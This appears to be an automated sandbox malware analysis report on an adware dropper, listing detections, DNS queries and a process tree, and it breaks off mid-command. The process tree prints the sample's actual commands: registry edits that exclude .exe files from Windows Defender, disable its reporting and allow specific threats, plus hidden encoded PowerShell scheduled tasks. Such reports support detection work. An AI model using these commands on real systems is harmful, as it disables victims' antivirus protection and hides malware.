Source: file.exe |
ReversingLabs: Detection: 36% |
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Avira: detection malicious, Label: HEUR/AGEN.1209690 |
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe |
ReversingLabs: Detection: 40% |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
ReversingLabs: Detection: 40% |
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
ReversingLabs: Detection: 40% |
Source: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe |
ReversingLabs: Detection: 40% |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040553A FindFirstFileA, |
0_2_0040553A |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004055DE __EH_prolog,FindFirstFileW,AreFileApisANSI,FindFirstFileA, |
0_2_004055DE |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\__data__\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\Temp\7zSD636.tmp\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\Local\ |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
File opened: C:\Users\user~1\AppData\ |
Jump to behavior |
Source: Traffic |
Snort IDS: 2041922 ET MALWARE Win32/Adware.Neoreklami.MI Activity M2 192.168.2.7:49726 -> 54.191.228.37:80 |
Source: |
DNS query: api4.check-data.xyz |
Source: |
DNS query: api4.check-data.xyz |
Source: powershell.exe, 00000012.00000002.508261836.000002127BFC0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422385482.00000000031A0000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.globalsign.net/root-r2.crl0 |
Source: powershell.exe, 00000012.00000002.346158647.0000021262345000.00000004.00000020.00020000.00000000.sdmp |
String found in binary or memory: http://crl.micr |
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://nuget.org/NuGet.exe |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://pesterbdd.com/images/Pester.png |
Source: powershell.exe, 00000012.00000002.346924306.0000021263EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.422985802.00000000036E1000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/ |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/Icon |
Source: powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://contoso.com/License |
Source: powershell.exe, 00000012.00000002.356255986.00000212640A3000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://github.com/Pester/Pester |
Source: powershell.exe, 00000012.00000002.501402298.0000021273F0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.504531194.0000021274045000.00000004.00000800.00020000.00000000.sdmp |
String found in binary or memory: https://nuget.org/nuget.exe |
Source: unknown |
DNS traffic detected: queries for: www.testupdate.info |
Source: file.exe, 00000000.00000002.504759648.00000000007CA000.00000004.00000020.00020000.00000000.sdmp |
Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/> |
|
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Process created: Commandline size = 3260 |
|
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Process created: Commandline size = 3260 |
Jump to behavior |
Source: file.exe |
Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
File deleted: C:\Windows\SysWOW64\GroupPolicyFpDoy |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
File created: C:\Windows\system32\GroupPolicy\gpt.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004162A6 |
0_2_004162A6 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_0040E5A5 |
0_2_0040E5A5 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_004126B0 |
0_2_004126B0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00403A01 |
0_2_00403A01 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418EF1 |
0_2_00418EF1 |
Source: C:\Users\user\Desktop\file.exe |
Code function: 0_2_00418FCB |
0_2_00418FCB |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_0693FC20 |
31_2_0693FC20 |
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe |
Code function: 31_2_069378F0 |
31_2_069378F0 |
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00403A9C appears 33 times |
|
Source: C:\Users\user\Desktop\file.exe |
Code function: String function: 00413954 appears 177 times |
|
Source: file.exe, 00000000.00000000.241737223.0000000000427000.00000002.00000001.01000000.00000003.sdmp |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: file.exe |
Binary or memory string: OriginalFilename7zS.sfx.exe, vs file.exe |
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: Joe Sandbox View |
Dropped File: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: Joe Sandbox View |
Dropped File: C:\Windows\Temp\HXDQertRGOTVyfYK\hElxpyKZHjbNPMc\rwZEaTv.exe 6267F16C7A74D8C26F6D6CBE39E28044F55ECF16D82CBDFFBC1EFD3625393C42 |
Source: file.exe |
ReversingLabs: Detection: 36% |
Source: C:\Users\user\Desktop\file.exe |
File read: C:\Users\user\Desktop\file.exe |
Jump to behavior |
Source: file.exe |
Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: C:\Users\user\Desktop\file.exe |
Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers |
Jump to behavior |
Source: unknown |
Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
|
Source: C:\Users\user\Desktop\file.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe .\Install.exe |
|
Source: C:\Users\user\AppData\Local\Temp\7zSD636.tmp\Install.exe |
Process created: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe .\Install.exe /S /site_id "525403" |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\forfiles.exe C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\forfiles.exe |
Process created: C:\Windows\SysWOW64\cmd.exe /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64& |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32 |
|
Source: C:\Windows\SysWOW64\cmd.exe |
Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "gYzDOohkP" /SC once /ST 07:29:03 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /run /I /tn "gYzDOohkP" |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /DELETE /F /TN "gYzDOohkP" |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: C:\Users\user\AppData\Local\Temp\7zSE3E2.tmp\Install.exe |
Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /CREATE /TN "bltLOfaNnqcomuNOFZ" /SC once /ST 16:17:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe\" 6Q /site_id 525403 /S" /V1 /F |
|
Source: C:\Windows\SysWOW64\schtasks.exe |
Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
|
Source: unknown |
Process created: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe 6Q /site_id 525403 /S |
|
Source: C:\Users\user\AppData\Local\Temp\wNHweptAdYeuLCNuf\uZOaPqpyItvbGVj\jKHLerL.exe |
Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAc |